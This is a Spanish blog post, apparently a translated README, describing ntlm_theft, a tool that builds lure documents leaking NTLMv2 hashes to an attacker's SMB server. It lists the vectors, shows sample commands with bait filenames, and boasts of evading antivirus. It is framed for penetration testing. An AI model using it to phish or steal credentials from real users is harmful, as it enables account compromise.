in

Una herramienta para generar múltiples tipos de archivos de robo de hash NTLMv2




Una herramienta para generar múltiples tipos de archivos de robo de hash NTLMv2.

ntlm_theft es una herramienta Python3 de código abierto que genera 21 tipos diferentes de documentos de robo de hash. Estos pueden usarse para phishing si el objetivo permite el tráfico de smb fuera de su red o si ya se encuentra dentro de la red interna.

Las ventajas de estos tipos de archivos sobre, por ejemplo, documentos basados ​​en macros o documentos de explotación, es que todos se crean con la «funcionalidad prevista». Windows Defender Antivirus no informó de ninguno en junio de 2020, y 17 de los 21 ataques funcionaron en un host de Windows 10 completamente parcheado.

ntlm_theft admite los siguientes tipos de ataques:

  • Navegue a la carpeta con
    • .url: a través del campo URL
    • .url – a través del campo ICONFILE
    • .lnk: a través del campo icon_location
    • .scf: a través del campo ICONFILE (no funciona en la última versión de Windows)
    • autorun.inf a través del campo OPEN (no funciona en la última versión de Windows)
    • desktop.ini: a través del campo IconResource (no funciona en la última versión de Windows)
  • Abrir documento
    • .xml: a través de una hoja de estilo externa de Microsoft Word
    • .xml: a través del campo de imagen incluido en Microsoft Word
    • .htm: a través de Chrome, IE y Edge img src (solo si se abre localmente, no está alojado)
    • .docx: a través del campo de imagen incluido en Microsoft Word
    • .docx: a través de una plantilla externa de Microsoft Word
    • .docx: a través de Microsoft Word Frameset WebSettings
    • .xlsx: a través de una celda externa de Microsoft Excel
    • .wax: a través de la lista de reproducción de Windows Media Player (mejor, principalmente abierto)
    • .asx: a través de la lista de reproducción de Windows Media Player (mejor, principalmente abierto)
    • .m3u: a través de la lista de reproducción de Windows Media Player (lo que es peor, Win10 se abre primero en Groovy)
    • .jnlp: a través de un contenedor Java externo
    • .aplicación: a través de cualquier navegador (debe operarse a través de un navegador descargado o no se ejecutará)
  • Abrir documento y aceptar ventana emergente
    • .pdf: a través de Adobe Acrobat Reader
  • En el programa de chat, haga clic en Enlace
    • .txt: enlace con formato para pegarlo en el chat de zoom

Casos de uso (por qué desea hacer esto)

ntlm_theft está dirigido principalmente a probadores de penetración y personas que lo utilizan para llevar a cabo phishing interno en empleados de la empresa objetivo o para probar antivirus y pasarelas de correo electrónico en masa. También se puede utilizar para suplantación de identidad externa si se permite el acceso SMB saliente en el firewall perimetral.

En las pruebas de penetración me resultó útil ver qué tipos de archivos están disponibles para mí en lugar de perder tiempo configurando un ataque específico como sería la norma con los compromisos de Red Teaming. Puede enviar un archivo .rtf o .docx a RR.HH. y una hoja de cálculo .xlsx a finanzas.

Empezado

Estas instrucciones le muestran los requisitos y el uso de ntlm_theft.

requisitos

ntlm_theft requiere Python3 y xlsxwriter:

Parámetros requeridos

Para iniciar la herramienta, se deben especificar 4 parámetros, un formato de entrada, el archivo o carpeta de entrada y el modo de funcionamiento básico:

-g, --generate	: Choose to generate all files or a specific filetype
-s, --server : The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
-f, --filename : The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4)

Ejecuciones de muestra

A continuación, se muestra un ejemplo de cómo se ve una ejecución que genera todos los archivos:

# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

A continuación, se muestra un ejemplo de cómo se ve una ejecución que solo genera archivos modernos:

# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the late st versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.

Aquí hay un ejemplo de cómo se vería una ejecución que solo genera un archivo xlsx:

# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.

Autores

  • Jacob WilkinInvestigación y desarrollo

Licencia

ntlm_theft Creado por Jacob Wilkin Copyright (C) 2020 Jacob Wilkin

Este programa es software libre: puede redistribuirlo y / o modificarlo según los términos de la Licencia Pública General GNU publicada por la Free Software Foundation, ya sea la versión 3 de la licencia o (a su elección) cualquier versión posterior.

Este programa se distribuye con la esperanza de que sea útil, pero SIN NINGUNA GARANTÍA; incluso sin la garantía implícita de COMERCIABILIDAD o APTITUD PARA UN PROPÓSITO PARTICULAR. Consulte la Licencia pública general GNU para obtener más información.

acción de gracias



What do you think?

Written by Helen Lafayette

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

GIPHY App Key not set. Please check settings

Errores críticos detectados en la aplicación de Azure que Microsoft instala en secreto en máquinas virtuales Linux

The Week Inside Ransomware – 17 de septiembre de 2021